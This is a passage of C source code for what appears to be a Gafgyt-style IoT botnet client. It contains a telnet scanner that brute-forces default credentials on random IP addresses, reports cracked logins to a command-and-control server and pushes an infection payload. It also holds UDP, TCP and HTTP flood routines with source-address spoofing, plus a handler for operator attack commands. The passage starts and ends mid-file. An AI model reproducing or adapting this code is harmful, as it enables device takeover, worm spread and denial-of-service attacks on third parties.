1162. while(read(fd, buffer, BUFFER_SIZE - 1) != 0){
1163. FILE *f;
1164. f = fopen("x", "a");
1165. fprintf(f, "%s", buffer);
1166. fclose(f);
1167. bzero(buffer, BUFFER_SIZE);
1168. }
1169.  
1170. shutdown(fd, SHUT_RDWR);
1171. close(fd);
1172. }
1173.  
1174. void StartTheLelz(int wait_usec, int maxfds)
1175. {
1176. int i, res, num_tmps, j;
1177. char buf[128], cur_dir;
1178.  
1179. int max = maxfds;
1180. fd_set fdset;
1181. struct timeval tv;
1182. socklen_t lon;
1183. int valopt;
1184.  
1185. srand(time(NULL) ^ rand_cmwc());
1186.  
1187. char line[256];
1188. char* buffer;
1189. struct sockaddr_in dest_addr;
1190. dest_addr.sin_family = AF_INET;
1191. dest_addr.sin_port = htons(23);
1192. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1193.  
1194. buffer = malloc(BUFFER_SIZE + 1);
1195. memset(buffer, 0, BUFFER_SIZE + 1);
1196.  
1197. struct telstate_t fds[max];
1198.  
1199.  
1200. memset(fds, 0, max * (sizeof(int) + 1));
1201. for(i = 0; i < max; i++)
1202. {
1203. memset(&(fds[i]), 0, sizeof(struct telstate_t));
1204. fds[i].complete = 1;
1205. fds[i].sockbuf = buffer;
1206. }
1207. for(num_tmps = 0; tmpdirs[++num_tmps] != 0; );
1208.  
1209.  
1210.  
1211. while(1)
1212. {
1213. for(i = 0; i < max; i++)
1214. {
1215. if(fds[i].totalTimeout == 0)
1216. {
1217. fds[i].totalTimeout = time(NULL);
1218. }
1219.  
1220. switch(fds[i].state)
1221. {
1222. case 0:
1223. {
1224. if(fds[i].complete == 1)
1225. {
1226. // clear the current fd
1227. char *tmp = fds[i].sockbuf;
1228. memset(&(fds[i]), 0, sizeof(struct telstate_t));
1229. fds[i].sockbuf = tmp;
1230. // get a new random ip
1231. fds[i].ip = findARandomIP();
1232. }
1233. else if(fds[i].complete == 0)
1234. {
1235. fds[i].passwordInd++;
1236. fds[i].usernameInd++;
1237.  
1238. if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *))
1239. {
1240. fds[i].complete = 1;
1241. continue;
1242. }
1243. if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *))
1244. {
1245. fds[i].complete = 1;
1246. continue;
1247. }
1248. }
1249.  
1250. dest_addr.sin_family = AF_INET;
1251. dest_addr.sin_port = htons(23);
1252. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1253. dest_addr.sin_addr.s_addr = fds[i].ip;
1254.  
1255. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
1256.  
1257. if(fds[i].fd == -1) continue;
1258.  
1259. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
1260.  
1261. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
1262. {
1263. reset_telstate(&fds[i]);
1264. }
1265. else
1266. {
1267. advance_state(&fds[i], 1);
1268. }
1269. }
1270. break;
1271.  
1272. case 1:
1273. {
1274. FD_ZERO(&fdset);
1275. FD_SET(fds[i].fd, &fdset);
1276. tv.tv_sec = 0;
1277. tv.tv_usec = wait_usec;
1278. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
1279.  
1280. if(res == 1)
1281. {
1282. lon = sizeof(int);
1283. valopt = 0;
1284. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
1285. //printf("%d\n",valopt);
1286. if(valopt)
1287. {
1288. reset_telstate(&fds[i]);
1289. }
1290. else
1291. {
1292. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
1293. advance_state(&fds[i], 2);
1294. }
1295. continue;
1296. }
1297. else if(res == -1)
1298. {
1299. reset_telstate(&fds[i]);
1300. continue;
1301. }
1302.  
1303. if(fds[i].totalTimeout + 6 < time(NULL))
1304. {
1305. reset_telstate(&fds[i]);
1306. }
1307. }
1308. break;
1309.  
1310. case 2:
1311. {
1312. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances))
1313. {
1314. if(contains_fail(fds[i].sockbuf))
1315. {
1316. advance_state(&fds[i], 0);
1317. }
1318. else
1319. {
1320. advance_state(&fds[i], 3);
1321. }
1322.  
1323. continue;
1324. }
1325.  
1326. if(fds[i].totalTimeout + 6 < time(NULL))
1327. {
1328. reset_telstate(&fds[i]);
1329. }
1330. }
1331. break;
1332.  
1333. case 3:
1334. {
1335. if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
1336. {
1337. reset_telstate(&fds[i]);
1338. continue;
1339. }
1340.  
1341. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
1342. {
1343. reset_telstate(&fds[i]);
1344. continue;
1345. }
1346.  
1347. advance_state(&fds[i], 4);
1348. }
1349. break;
1350.  
1351. case 4:
1352. {
1353. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances))
1354. {
1355. if(contains_fail(fds[i].sockbuf))
1356. {
1357. advance_state(&fds[i], 0);
1358. }
1359. else
1360. {
1361. advance_state(&fds[i], 5);
1362. }
1363. continue;
1364. }
1365.  
1366. if(fds[i].totalTimeout + 6 < time(NULL))
1367. {
1368. reset_telstate(&fds[i]);
1369. }
1370. }
1371. break;
1372.  
1373. case 5:
1374. {
1375. if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
1376. {
1377. reset_telstate(&fds[i]);
1378. continue;
1379. }
1380.  
1381. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
1382. {
1383. reset_telstate(&fds[i]);
1384. continue;
1385. }
1386.  
1387. advance_state(&fds[i], 6);
1388. }
1389. break;
1390.  
1391. case 6:
1392. {
1393. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances2))
1394. {
1395. fds[i].totalTimeout = time(NULL);
1396.  
1397. if(contains_fail(fds[i].sockbuf))
1398. {
1399. advance_state(&fds[i], 0);
1400. }
1401. else if(contains_success(fds[i].sockbuf))
1402. {
1403. if(fds[i].complete == 2)
1404. {
1405. advance_state(&fds[i], 7);
1406. }
1407. else
1408. {
1409. sockprintf(mainCommSock, "TELNET LOGIN CRACKED - %s:%s:%s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
1410. sockprintf(mainCommSock, "unctelnet %s|%s|%s|23", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
1411. advance_state(&fds[i], 7);
1412. echoLoader();
1413. send(fds[i].fd, infect, strlen(infect), MSG_NOSIGNAL);
1414. }
1415. }
1416. else
1417. {
1418. reset_telstate(&fds[i]);
1419. }
1420. continue;
1421. }
1422.  
1423.  
1424. if(fds[i].totalTimeout + 7 < time(NULL))
1425. {
1426. reset_telstate(&fds[i]);
1427. }
1428. }
1429. break;
1430. case 7:
1431. {
1432. for(j = 0; j < num_tmps; j++)
1433. {
1434. memset(buf, 0, 128);
1435. if(j == 0)
1436. snprintf(buf, 127, ">%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve\r\n", tmpdirs[j], tmpdirs[j], tmpdirs[j], tmpdirs[j]);
1437. else
1438. snprintf(buf, 127, ">%s.t && cd %s ; >retrieve\r\n", tmpdirs[j], tmpdirs[j], tmpdirs[j]);
1439.  
1440. if(send(fds[i].fd, buf, strlen(buf), MSG_NOSIGNAL) < 0)
1441. {
1442. reset_telstate(&fds[i]);
1443. continue;
1444. }
1445. }
1446. advance_state(&fds[i], 8);
1447. }
1448. break;
1449. case 8:
1450. {
1451. fds[i].totalTimeout = time(NULL);
1452. if(send(fds[i].fd, infect, strlen(infect), MSG_NOSIGNAL) < 0)
1453. {
1454. sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
1455. reset_telstate(&fds[i]);
1456. continue;
1457. }
1458. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, infected))
1459. {
1460. if(strcasestr(fds[i].sockbuf, infectedmessage) && fds[i].complete != 3)
1461. {
1462. sockprintf(mainCommSock, "INFECTION SUCCESS - %s:%s:%s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
1463. sockprintf(mainCommSock, "Telnet\'d %s|%s|%s|23", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
1464. fds[i].complete = 3;
1465. }
1466. }
1467. if(fds[i].totalTimeout + 300 < time(NULL))
1468. {
1469. if(fds[i].complete !=3){
1470. echoLoader();
1471. sockprintf(mainCommSock, "FAILED TO INFECT - %s:%s:%s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
1472. }
1473. reset_telstate(&fds[i]);
1474. }
1475. break;
1476. }
1477. }
1478. }
1479. }
1480. }
1481.  
1482. void sendSTD(unsigned char *ip, int port, int secs) {
1483.  
1484. int iSTD_Sock;
1485.  
1486. iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
1487.  
1488. time_t start = time(NULL);
1489.  
1490. struct sockaddr_in sin;
1491.  
1492. struct hostent *hp;
1493.  
1494. hp = gethostbyname(ip);
1495.  
1496. bzero((char*) &sin,sizeof(sin));
1497. bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
1498. sin.sin_family = hp->h_addrtype;
1499. sin.sin_port = port;
1500.  
1501. unsigned int a = 0;
1502.  
1503. while(1){
1504. if (a >= 50)
1505. {
1506. send(iSTD_Sock, STD2_STRING, STD2_SIZE, 0);
1507. connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
1508. if (time(NULL) >= start + secs)
1509. {
1510. close(iSTD_Sock);
1511. _exit(0);
1512. }
1513. a = 0;
1514. }
1515. a++;
1516. }
1517.  
1518.  
1519. }
1520.  
1521. void sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval, int sleepcheck, int sleeptime)
1522. {
1523. struct sockaddr_in dest_addr;
1524.  
1525. dest_addr.sin_family = AF_INET;
1526. if(port == 0) dest_addr.sin_port = rand_cmwc();
1527. else dest_addr.sin_port = htons(port);
1528. if(getHost(target, &dest_addr.sin_addr)) return;
1529. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1530.  
1531. register unsigned int pollRegister;
1532. pollRegister = pollinterval;
1533.  
1534. if(spoofit == 32)
1535. {
1536. int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
1537. if(!sockfd)
1538. {
1539. sockprintf(mainCommSock, "Failed opening raw socket.");
1540. return;
1541. }
1542.  
1543. unsigned char *buf = (unsigned char *)malloc(packetsize + 1);
1544. if(buf == NULL) return;
1545. memset(buf, 0, packetsize + 1);
1546. makeRandomStr(buf, packetsize);
1547.  
1548. int end = time(NULL) + timeEnd;
1549. register unsigned int i = 0;
1550. register unsigned int ii = 0;
1551. while(1)
1552. {
1553. sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1554.  
1555. if(i == pollRegister)
1556. {
1557. if(port == 0) dest_addr.sin_port = rand_cmwc();
1558. if(time(NULL) > end) break;
1559. i = 0;
1560. continue;
1561. }
1562. i++;
1563. if(ii == sleepcheck)
1564. {
1565. usleep(sleeptime*1000);
1566. ii = 0;
1567. continue;
1568. }
1569. ii++;
1570. }
1571. } else {
1572. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
1573. if(!sockfd)
1574. {
1575. sockprintf(mainCommSock, "Failed opening raw socket.");
1576. return;
1577. }
1578.  
1579. int tmp = 1;
1580. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
1581. {
1582. sockprintf(mainCommSock, "Failed setting raw headers mode.");
1583. return;
1584. }
1585.  
1586. int counter = 50;
1587. while(counter--)
1588. {
1589. srand(time(NULL) ^ rand_cmwc());
1590. init_rand(rand());
1591. }
1592.  
1593. in_addr_t netmask;
1594.  
1595. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
1596. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
1597.  
1598. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
1599. struct iphdr *iph = (struct iphdr *)packet;
1600. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
1601.  
1602. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
1603.  
1604. udph->len = htons(sizeof(struct udphdr) + packetsize);
1605. udph->source = rand_cmwc();
1606. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1607. udph->check = 0;
1608.  
1609. makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
1610.  
1611. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1612.  
1613. int end = time(NULL) + timeEnd;
1614. register unsigned int i = 0;
1615. register unsigned int ii = 0;
1616. while(1)
1617. {
1618. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1619.  
1620. udph->source = rand_cmwc();
1621. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1622. iph->id = rand_cmwc();
1623. iph->saddr = htonl( getRandomIP(netmask) );
1624. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1625.  
1626. if(i == pollRegister)
1627. {
1628. if(time(NULL) > end) break;
1629. i = 0;
1630. continue;
1631. }
1632. i++;
1633.  
1634. if(ii == sleepcheck)
1635. {
1636. usleep(sleeptime*1000);
1637. ii = 0;
1638. continue;
1639. }
1640. ii++;
1641. }
1642. }
1643. }
1644.  
1645. void spoofTest(unsigned char *target, int port)
1646. {
1647. struct sockaddr_in dest_addr;
1648.  
1649. dest_addr.sin_family = AF_INET;
1650. if(port == 0) dest_addr.sin_port = rand_cmwc();
1651. else dest_addr.sin_port = htons(port);
1652. if(getHost(target, &dest_addr.sin_addr)) return;
1653. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1654.  
1655.  
1656. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
1657. if(!sockfd)
1658. {
1659. sockprintf(mainCommSock, "Failed opening raw socket.");
1660. return;
1661. }
1662.  
1663. int tmp = 1;
1664. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
1665. {
1666. sockprintf(mainCommSock, "Failed setting raw headers mode.");
1667. return;
1668. }
1669.  
1670. int counter = 50;
1671. while(counter--)
1672. {
1673. srand(time(NULL) ^ rand_cmwc());
1674. init_rand(rand());
1675. }
1676.  
1677. in_addr_t netmask;
1678.  
1679. netmask = ( ~((in_addr_t) -1) );
1680.  
1681. char *test = "";
1682. szprintf(test,"%s",inet_ntoa(ourPublicIP));
1683.  
1684. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + strlen(test)];
1685. struct iphdr *iph = (struct iphdr *)packet;
1686. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
1687.  
1688. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + strlen(test));
1689.  
1690. udph->len = htons(sizeof(struct udphdr) + strlen(test));
1691. udph->source = rand_cmwc();
1692. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1693. udph->check = 0;
1694.  
1695. szprintf((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), "%s", test);
1696.  
1697. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1698.  
1699. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1700. }
1701.  
1702. void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval)
1703. {
1704. register unsigned int pollRegister;
1705. pollRegister = pollinterval;
1706.  
1707. struct sockaddr_in dest_addr;
1708.  
1709. dest_addr.sin_family = AF_INET;
1710. if(port == 0) dest_addr.sin_port = rand_cmwc();
1711. else dest_addr.sin_port = htons(port);
1712. if(getHost(target, &dest_addr.sin_addr)) return;
1713. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1714.  
1715. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
1716. if(!sockfd)
1717. {
1718. sockprintf(mainCommSock, "Failed opening raw socket.");
1719. return;
1720. }
1721.  
1722. int tmp = 1;
1723. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
1724. {
1725. sockprintf(mainCommSock, "Failed setting raw headers mode.");
1726. return;
1727. }
1728.  
1729. in_addr_t netmask;
1730.  
1731. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
1732. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
1733.  
1734. unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
1735. struct iphdr *iph = (struct iphdr *)packet;
1736. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
1737.  
1738. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
1739.  
1740. tcph->source = rand_cmwc();
1741. tcph->seq = rand_cmwc();
1742. tcph->ack_seq = 0;
1743. tcph->doff = 5;
1744.  
1745. if(!strcmp(flags, "all"))
1746. {
1747. tcph->syn = 1;
1748. tcph->rst = 1;
1749. tcph->fin = 1;
1750. tcph->ack = 1;
1751. tcph->psh = 1;
1752. } else {
1753. unsigned char *pch = strtok(flags, ",");
1754. while(pch)
1755. {
1756. if(!strcmp(pch, "syn"))
1757. {
1758. tcph->syn = 1;
1759. } else if(!strcmp(pch, "rst"))
1760. {
1761. tcph->rst = 1;
1762. } else if(!strcmp(pch, "fin"))
1763. {
1764. tcph->fin = 1;
1765. } else if(!strcmp(pch, "ack"))
1766. {
1767. tcph->ack = 1;
1768. } else if(!strcmp(pch, "psh"))
1769. {
1770. tcph->psh = 1;
1771. } else {
1772. sockprintf(mainCommSock, "Invalid flag \"%s\"", pch);
1773. }
1774. pch = strtok(NULL, ",");
1775. }
1776. }
1777.  
1778. tcph->window = rand_cmwc();
1779. tcph->check = 0;
1780. tcph->urg_ptr = 0;
1781. tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
1782. tcph->check = tcpcsum(iph, tcph);
1783.  
1784. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1785.  
1786. int end = time(NULL) + timeEnd;
1787. register unsigned int i = 0;
1788. while(1)
1789. {
1790. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1791.  
1792. iph->saddr = htonl( getRandomIP(netmask) );
1793. iph->id = rand_cmwc();
1794. tcph->seq = rand_cmwc();
1795. tcph->source = rand_cmwc();
1796. tcph->check = 0;
1797. tcph->check = tcpcsum(iph, tcph);
1798. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1799.  
1800. if(i == pollRegister)
1801. {
1802. if(time(NULL) > end) break;
1803. i = 0;
1804. continue;
1805. }
1806. i++;
1807. }
1808. }
1809.  
1810. void sendHTTP(unsigned char *url, int end_time, int sleepcheck, int sleeptime)
1811. {
1812. int end = time(NULL) + end_time;
1813. FILE *pf;
1814. char *UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
1815.  
1816. char *command[80];
1817. sprintf(command,"wget -s -U \"");
1818. strcat(command, UA);
1819. strcat(command,"\" -q ");
1820. strcat(command, url);
1821. unsigned int ii = 0;
1822.  
1823. while(end > time(NULL))
1824. {
1825. UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
1826. sprintf(command,"wget -s -U \"");
1827. strcat(command, UA);
1828. strcat(command,"\" -q ");
1829. strcat(command, url);
1830. system(command);
1831.  
1832. if(ii == sleepcheck)
1833. {
1834. usleep(sleeptime*1000);
1835. ii = 0;
1836. continue;
1837. }
1838. ii++;
1839. }
1840.  
1841. }
1842.  
1843. void sendHTTP2(unsigned char *url, int end_time, int sleepcheck, int sleeptime)
1844. {
1845. int end = time(NULL) + end_time;
1846. char *UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
1847.  
1848.  
1849. char *command[80];
1850. sprintf(command,"wget -O /tmp/yuagwduiagwdhg/a -U \"");
1851. strcat(command, UA);
1852. strcat(command,"\" -q ");
1853. strcat(command, url);
1854. unsigned int ii = 0;
1855.  
1856. while(end > time(NULL))
1857. {
1858. UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
1859. sprintf(command,"wget -O /tmp/yuagwduiagwdhg/a -U \"");
1860. strcat(command, UA);
1861. strcat(command,"\" -q ");
1862. strcat(command, url);
1863. system(command);
1864.  
1865. if(ii == sleepcheck)
1866. {
1867. usleep(sleeptime*1000);
1868. ii = 0;
1869. continue;
1870. }
1871. ii++;
1872. }
1873.  
1874. }
1875.  
1876. void sendCNC(unsigned char *ip,int port, int end_time)
1877. {
1878. int end = time(NULL) + end_time;
1879. int sockfd;
1880. struct sockaddr_in server;
1881. //sockfd = socket(AF_INET, SOCK_STREAM, 0);
1882.  
1883. server.sin_addr.s_addr = inet_addr(ip);
1884. server.sin_family = AF_INET;
1885. server.sin_port = htons(port);
1886.  
1887. while(end > time(NULL))
1888. {
1889. sockfd = socket(AF_INET, SOCK_STREAM, 0);
1890. connect(sockfd , (struct sockaddr *)&server , sizeof(server));
1891. sleep(1);
1892. close(sockfd);
1893. }
1894.  
1895. }
1896.  
1897. void processCmd(int argc, unsigned char *argv[])
1898. {
1899. int x;
1900. if(!strcmp(argv[0], "PING"))
1901. {
1902. sockprintf(mainCommSock, "PONG!");
1903. return;
1904. }
1905.  
1906. if(!strcmp(argv[0], "NUP"))
1907. {
1908. if(argc > 0){
1909. char *ip = argv[1];
1910. ourPublicIP.s_addr = inet_addr(ip);
1911. sockprintf(mainCommSock, "TEST %s", inet_ntoa(ourIP));
1912. }
1913. return;
1914. }
1915.  
1916. if(!strcmp(argv[0], "SPOOF"))
1917. {
1918. if(argc > 2){
1919. char *ip = argv[1];
1920. int port = argv[2];
1921. spoofTest(ip,port);
1922. }
1923. return;
1924. }
1925.  
1926. if(!strcmp(argv[0], "KILLSUB"))
1927. {
1928. if(argc < 1 ){
1929. sockprintf(mainCommSock, "KILLSUB <sub version to kill>");
1930. }else{
1931. int subbbb = atoi(argv[1]);
1932. if(subbbb == subversionnnn){
1933. sockprintf(mainCommSock, "KMS!");
1934. exit(0);
1935. }else{
1936. sockprintf(mainCommSock, "not killing myself cuz im not that version");
1937. }
1938. }
1939. }
1940. if(!strcmp(argv[0], "TABLE"))
1941. {
1942. sockprintf(mainCommSock, "%d", getdtablesize());
1943. return;
1944. }
1945. if(!strcmp(argv[0], "SCAN"))
1946. {
1947. if(argc < 2)
1948. {
1949. sockprintf(mainCommSock, "SCAN <threads> <timeout>");
1950. return;
1951. }else{
1952. int threads = atoi(argv[1]);
1953. int timeout = atoi(argv[2]);
1954. if(!listFork())
1955. {
1956. sockprintf(mainCommSock, "Starting scanner!!");
1957. StartTheLelz(timeout, threads);
1958. _exit(0);
1959. }
1960. return;
1961. }
1962. }
1963.  
1964. if(!strcmp(argv[0], "GETLOCALIP"))
1965. {
1966. sockprintf(mainCommSock, "My IP: %s", inet_ntoa(ourIP));
1967. return;
1968. }
1969.  
1970. if(!strcmp(argv[0], "GETPUBLICIP"))
1971. {
1972. sockprintf(mainCommSock, "My Public IP: %s", inet_ntoa(ourPublicIP));
1973. return;
1974. }
1975.  
1976. if(!strcmp(argv[0], "VERSION"))
1977. {
1978. sockprintf(mainCommSock, "Version: %d.%d",versionnnn,subversionnnn);
1979. return;
1980. }
1981.  
1982. if(!strcmp(argv[0], "RANGE"))
1983. {
1984. if(argc < 2 || atoi(argv[1]) == -1){
1985. sockprintf(mainCommSock, "RANGE <option 0-idk>");
1986. }else{
1987. sockprintf(mainCommSock, "Range %d->%d", rangechoice, atoi(argv[1]));
1988. rangechoice = atoi(argv[1]);
1989. }
1990. return;
1991. }
1992.  
1993. if(!strcmp(argv[0], "DOUSPOOFBRAH?")){
1994. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
1995. if(!sockfd)
1996. {
1997. return;
1998. }
1999.  
2000. int tmp = 1;
2001. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
2002. {
2003. return;
2004. }else{
2005. sockprintf(mainCommSock, "FUK YEA I DO (%s)", inet_ntoa(ourPublicIP));
2006. }
2007. }
2008.  
2009. if(!strcmp(argv[0], "UDP"))
2010. {
2011. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[5]) == -1 || atoi(argv[5]) > 65536 || atoi(argv[5]) > 65500 || atoi(argv[4]) > 32 || (argc == 7 && atoi(argv[6]) < 1))
2012. {
2013. sockprintf(mainCommSock, "UDP <target> <port (0 for random)> <time> <netmask> <packet size> <poll interval> <sleep check> <sleep time(ms)>");
2014. return;
2015. }
2016.  
2017. unsigned char *ip = argv[1];
2018. int port = atoi(argv[2]);
2019. int time = atoi(argv[3]);
2020. int spoofed = atoi(argv[4]);
2021. int packetsize = atoi(argv[5]);
2022. int pollinterval = (argc > 6 ? atoi(argv[6]) : 1000);
2023. int sleepcheck = (argc > 7 ? atoi(argv[7]) : 1000000);
2024. int sleeptime = (argc > 8 ? atoi(argv[8]) : 0);
2025.  
2026. if(strstr(ip, ",") != NULL)
2027. {
2028. unsigned char *hi = strtok(ip, ",");
2029. while(hi != NULL)
2030. {
2031. if(!listFork())
2032. {
2033. sendUDP(hi, port, time, spoofed, packetsize, pollinterval, sleepcheck, sleeptime);
2034. _exit(0);
2035. }
2036. hi = strtok(NULL, ",");
2037. }
2038. } else {
2039. if (!listFork()){
2040. sendUDP(ip, port, time, spoofed, packetsize, pollinterval, sleepcheck, sleeptime);
2041. _exit(0);
2042. }
2043. }
2044. return;
2045. }
2046.  
2047. if(!strcmp(argv[0], "TCP"))
2048. {
2049. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 32 || (argc > 6 && atoi(argv[6]) < 0) || (argc == 8 && atoi(argv[7]) < 1))
2050. {
2051. sockprintf(mainCommSock, "TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)");
2052. return;
2053. }
2054.  
2055. unsigned char *ip = argv[1];
2056. int port = atoi(argv[2]);
2057. int time = atoi(argv[3]);
2058. int spoofed = atoi(argv[4]);
2059. unsigned char *flags = argv[5];
2060.  
2061. int pollinterval = argc == 8 ? atoi(argv[7]) : 10;
2062. int psize = argc > 6 ? atoi(argv[6]) : 0;
2063.  
2064. if(strstr(ip, ",") != NULL)
2065. {
2066. unsigned char *hi = strtok(ip, ",");
2067. while(hi != NULL)
2068. {
2069. if(!listFork())
2070. {
2071. sendTCP(hi, port, time, spoofed, flags, psize, pollinterval);
2072. _exit(0);
2073. }
2074. hi = strtok(NULL, ",");
2075. }
2076. } else {
2077. if (!listFork()) {
2078. sendTCP(ip, port, time, spoofed, flags, psize, pollinterval);
2079. _exit(0);
2080. }
2081. }
2082. }
2083. if(!strcmp(argv[0], "L7"))
2084. {
2085. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
2086. {
2087. sockprintf(mainCommSock, "L7 <protocol ip url> <time> <threads> <sleep check> <sleep time(ms)>");
2088. return;
2089. }
2090.  
2091. unsigned char *ip = argv[1];
2092. int time = atoi(argv[2]);
2093. int threads = atoi(argv[3]);
2094. int sleepcheck = (argc > 4 ? atoi(argv[4]) : 1000000);
2095. int sleeptime = (argc > 5 ? atoi(argv[5]) : 0);
2096. system("mkdir /tmp/yuagwduiagwdhg");
2097.  
2098. if(strstr(ip, ",") != NULL)
2099. {
2100. unsigned char *hi = strtok(ip, ",");
2101. while(hi != NULL)
2102. {
2103. int i = 0;
2104. while(i < threads){
2105. if(!listFork())
2106. {
2107. sendHTTP(hi, time, sleepcheck, sleeptime);
2108. close(mainCommSock);
2109. _exit(0);
2110. }
2111. i++;
2112. }
2113. hi = strtok(NULL, ",");
2114. }
2115. } else{
2116. int i = 0;
2117. while(i < threads){
2118. if(!listFork()){
2119. sendHTTP(ip, time, sleepcheck, sleeptime);
2120. close(mainCommSock);
2121. _exit(0);
2122. }
2123. i++;
2124. }
2125. }
2126. }
2127.  
2128. if(!strcmp(argv[0], "L420"))
2129. {
2130. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
2131. {
2132. sockprintf(mainCommSock, "L7 <protocol ip url> <time> <threads> <sleep check> <sleep time(ms)>");
2133. return;
2134. }
2135.  
2136. unsigned char *ip = argv[1];
2137. int time = atoi(argv[2]);
2138. int threads = atoi(argv[3]);
2139. int sleepcheck = (argc > 4 ? atoi(argv[4]) : 1000000);
2140. int sleeptime = (argc > 5 ? atoi(argv[5]) : 0);
2141. system("mkdir /tmp/yuagwduiagwdhg");
2142.  
2143. if(strstr(ip, ",") != NULL)
2144. {
2145. unsigned char *hi = strtok(ip, ",");
